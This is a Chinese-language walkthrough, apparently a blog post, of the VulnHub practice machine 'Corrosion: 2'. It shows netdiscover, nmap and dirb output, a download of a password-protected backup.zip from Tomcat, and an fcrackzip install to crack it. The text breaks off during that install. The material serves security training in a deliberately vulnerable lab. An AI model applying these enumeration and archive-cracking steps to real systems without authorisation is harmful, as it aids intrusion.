第307个VulnHub靶场演练攻略Corrosion: 2

第307个VulnHub靶场演练攻略Corrosion: 2

Proxy Programmer’s Corrosion: 2

一款 Vulnhub 中型机器。我们可以从这里下载该实验室https://www.vulnhub.com/entry/corrosion-2,745/#description。该实验室专为经验丰富的 CTF 玩家设计，旨在帮助他们在各种情况下测试自己的能力。那么，让我们开始吧，看看如何将内容分解成更小的模块。

网络扫描

首先，我们必须使用netdiscover命令扫描网络以查找目标机器的 IP 地址。

网络发现
在这种情况下，受害者的 IP 地址是192.168.74.128。

┌──(root㉿kali)-[~]
└─# netdiscover  
Currently scanning: 172.23.193.0/16   |   Screen View: Unique Hosts        
                                                                            
 265 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 15900        
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.74.1    00:50:56:c0:00:08    238   14280  VMware, Inc.             
 192.168.74.2    00:50:56:eb:d3:ae     12     720  VMware, Inc.             
 192.168.74.128  00:0c:29:ca:74:6c     11     660  VMware, Inc.             
 192.168.74.254  00:50:56:ec:7b:ae      4     240  VMware, Inc. 

我们将使用Nmap来帮助我们推进这个过程。要查看所有已声明的服务，我们需要知道哪些服务现在可用。

nmap -sV 192.168.74.128

┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.74.128          
Starting Nmap 7.93 ( https://nmap.org ) at 2025-05-18 07:01 EDT
Nmap scan report for 192.168.74.128
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open  http    Apache Tomcat 9.0.53
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds

根据 nmap 输出，我们有：

端口 22 上有一个 SSH 服务器。
在端口 80 上，有一个 HTTP 服务（Apache 服务器）。
在端口 8080 上，Tomcat 服务器正在端口 8080 上运行。

枚举

我们先来看看80端口上的 http 服务。这没什么奇怪的，只是一个Apache 服务器页面而已。

接下来，我们查看了Tomcat 服务器，它正在监听8080端口。这是一个简单的页面，没有任何可疑之处。

我们在网站上没有发现任何有害内容。因此，为了进一步进行实验，我们使用dirb目录获取一些信息。太棒了！我们发现了一个包含备份 zip 文件的目录。

dirb http://192.168.74.128:8080/-X .php,.zip

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.74.128:8080/ -X .php,.zip

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 18 07:19:54 2025
URL_BASE: http://192.168.74.128:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.zip) | (.php)(.zip) [NUM = 2]

-----------------

                                                                             GENERATED WORDS: 4612

---- Scanning URL: http://192.168.74.128:8080/ ----
                                                                             + http://192.168.74.128:8080/backup.zip (CODE:200|SIZE:33723)               
                                                                               
-----------------
END_TIME: Sun May 18 07:20:02 2025
DOWNLOADED: 9224 - FOUND: 1

然后使用wget命令下载备份 zip 文件。

──(kali㉿kali)-[~]
└─$ 
wget http://192.168.74.128:8080/backup.zip
unzip backup.zip
--2025-05-18 07:57:24--  http://192.168.74.128:8080/backup.zip
Connecting to 192.168.74.128:8080... connected.
HTTP request sent, awaiting response... 200 
Length: 33723 (33K) [application/zip]
Saving to: ‘backup.zip’

backup.zip          100%[================>]  32.93K  --.-KB/s    in 0s      

2025-05-18 07:57:24 (352 MB/s) - ‘backup.zip’ saved [33723/33723]

Archive:  backup.zip
[backup.zip] catalina.policy password: 

┌──(kali㉿kali)-[~]
└─$ sudo apt install fcrackzip
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libfcgi-bin libnsl-dev libregexp-assemble-perl libtirpc-dev
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  wordlist
The following NEW packages will be installed:
  fcrackzip
0 upgraded, 1 newly installed, 0 to remove and 1994 not upgraded.
Need to get 27.5 kB of archives.
After this operation, 81.9 kB of additional disk space will be used.
Get:1 http://free.nchc.org.tw/kali kali-rolling/main amd64 fcrackzip amd64 1.0-12 [27.5 kB]
Fetched 27.5 kB in 4s (6,759 B/s)    
Selecting previously unselected package fcrackzip.
(Reading database ... 395193 files and directories currently installed.)
Preparing to unpack .../fcrackzip_1.0-12_amd64.deb ...
Unpacking fcrackzip (1.0-12) ...
Setting up fcrackzip (1.0-12) ...
Processing triggers for man-db (2.11.2-1